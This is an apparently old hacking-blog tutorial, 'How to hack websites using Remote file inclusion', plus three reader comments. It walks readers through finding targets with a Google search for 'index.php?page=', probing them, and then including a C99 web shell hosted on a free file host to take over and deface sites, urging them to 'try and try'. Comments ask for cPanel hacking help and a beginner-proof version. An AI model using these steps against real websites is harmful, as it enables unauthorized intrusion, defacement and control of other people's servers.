How to hack websites using Remote file inlcusion | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

How to hack websites using Remote file inlcusion



 By Adnan Anjum
I receive many E-mails on How To Hack websites so,
 today I will demonstrate how hackers use remote file inlcusion to deface websites.

Requirements
C99 shell


First of all visit google and type

"index.php?page="

This will show all the pages which have index.php?page=" in their url, RFI vulnerabilities only work on those sites which have index.php?page= in their url.


Now lets say that the website is as follows:


www.targetsite.com/index.php?page=something


so to check the vulnerability we will replace the something to
Google or any other site now if Google homepage shows up this means that the website is vulnerable to the attack.The url will look like


                                                       
www.targetsite.com/index.php?page=www.google.com



Once we know that the website is vulnerable to the attack we will now include the c99 shell.To do it download the c99 shell and then upload it to a webhosting site such as Welcome to Ripway.com - free file hosting, free music hosting, direct linking or Most Endorsed FREE Website Hosting Provider | Free Web Hosting


Once the shell is uploaded you will have a unique url for your shell lets say it is


www.webhostingsite.com/c99.txt


Now to execute the shell in order to gain access to the website we will do as follows


http://www.targetsite.com/index.php?...e.com/c99.txt?


Dont forgett the "?" or else it wont be executed.


Remeber this does not work on all websites so the key is to try and try and try and try! 

regards,
Adnan Anjum




Share your views...

3 Respones to "How to hack websites using Remote file inlcusion"

Anonymous said...

Man pls i want to know how to get web control cpanel of a site hack... after getting a site vulnerable and u have added mark' and it shows error how can u get d cpanel hack not d admin..
u can reply to ver3nr@hotmail.com


August 28, 2010 at 12:16 PM
Anonymous said...

hey can u make a n00b prove tutorial, please!


September 14, 2010 at 2:38 AM
Unknown said...

GOOD ITS TRUE


April 2, 2011 at 1:53 PM

Post a Comment

 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com